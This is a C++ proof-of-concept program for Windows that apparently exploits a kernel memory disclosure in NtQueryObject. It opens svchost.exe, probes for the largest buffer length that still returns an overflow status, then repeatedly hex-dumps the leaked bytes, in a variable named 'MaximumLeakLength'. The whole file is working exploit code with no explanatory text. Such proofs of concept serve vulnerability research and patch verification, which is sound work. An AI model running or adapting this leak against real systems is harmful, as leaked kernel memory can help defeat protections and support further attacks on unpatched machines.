#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <cstdio>

#define ObjectNameInformation ((OBJECT_INFORMATION_CLASS)1)

VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  for (ULONG i = 0; i < dwBytes; i += 16) {
    printf("%.8x: ", i);

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes) {
        printf("%.2x ", Data[i + j]);
      }
      else {
        printf("?? ");
      }
    }

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
        printf("%c", Data[i + j]);
      }
      else {
        printf(".");
      }
    }

    printf("\n");
  }
}

int main() {
  BOOL wow64 = FALSE;
  if (!IsWow64Process(GetCurrentProcess(), &wow64) || wow64) {
    printf("The program has to be built for the native architecture of your OS (x86 or x64).\n");
    return 1;
  }

  HANDLE hFile = CreateFile(L"C:\\Windows\\system32\\svchost.exe", FILE_READ_ATTRIBUTES, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  if (hFile == INVALID_HANDLE_VALUE) {
    printf("CreateFile failed, %d\n", GetLastError());
    return 1;
  }

  BYTE OutputBuffer[0x100];
  ULONG ReturnLength;
  ULONG MaximumLeakLength;

  for (MaximumLeakLength = 0; MaximumLeakLength < sizeof(OutputBuffer); MaximumLeakLength++) {
    NTSTATUS st = NtQueryObject(hFile, ObjectNameInformation, OutputBuffer, MaximumLeakLength, &ReturnLength);
    if (st == STATUS_OBJECT_PATH_INVALID) {
      MaximumLeakLength--;
      break;
    }
  }

  while (1) {
    RtlZeroMemory(OutputBuffer, sizeof(OutputBuffer));

    NTSTATUS st = NtQueryObject(hFile, ObjectNameInformation, OutputBuffer, MaximumLeakLength, &ReturnLength);
    if (st != STATUS_BUFFER_OVERFLOW) {
      printf("NtQueryObject failed, %x\n", st);
      CloseHandle(hFile);
      return 1;
    }

    PrintHex(OutputBuffer, MaximumLeakLength);

    getchar();
  }

  CloseHandle(hFile);
  return 0;
}